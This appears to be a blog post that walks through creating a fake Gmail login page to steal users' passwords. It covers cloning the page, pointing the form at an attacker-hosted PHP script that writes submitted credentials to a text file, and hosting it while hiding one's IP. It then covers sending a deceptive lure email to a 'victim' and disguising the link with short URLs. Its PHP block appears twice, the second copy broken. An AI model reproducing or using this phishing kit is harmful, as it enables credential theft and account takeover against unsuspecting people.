This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.
Steps for Creating Phishing or Fake web Page:
Step 1:
Go to the gmail.com. Save the Page as "complet HTML" file
Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"
Step3:
Upload those image to tinypic or photobucker.com. copy the url of each image.
Step4:
Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .
Step 5:
Search for the
action="https://www.google.com/accounts/ServiceLoginAuth"
Replace it with
action="http://yoursite urlhere/login.php"
save the file.
Step6:
Now you need to create login.php
so you need to open the notepad and type as
<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save itheader("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.
Note: that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com.
use this sites through the secure connection sites(so that you can hide your ip address) like: http://flyproxy.com . find best secure connection site.
Step 8:
create an email with gmail keyword.
like : gmailburger@gmail.com
Step 9:
Send to victim similar to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.
Note:
For user to believe change Your phishing web page url with any of free short url sites.
Like : co.nr, co.cc,cz.cc
This will make users to believe that it is correct url.
0 komentar:
Post a Comment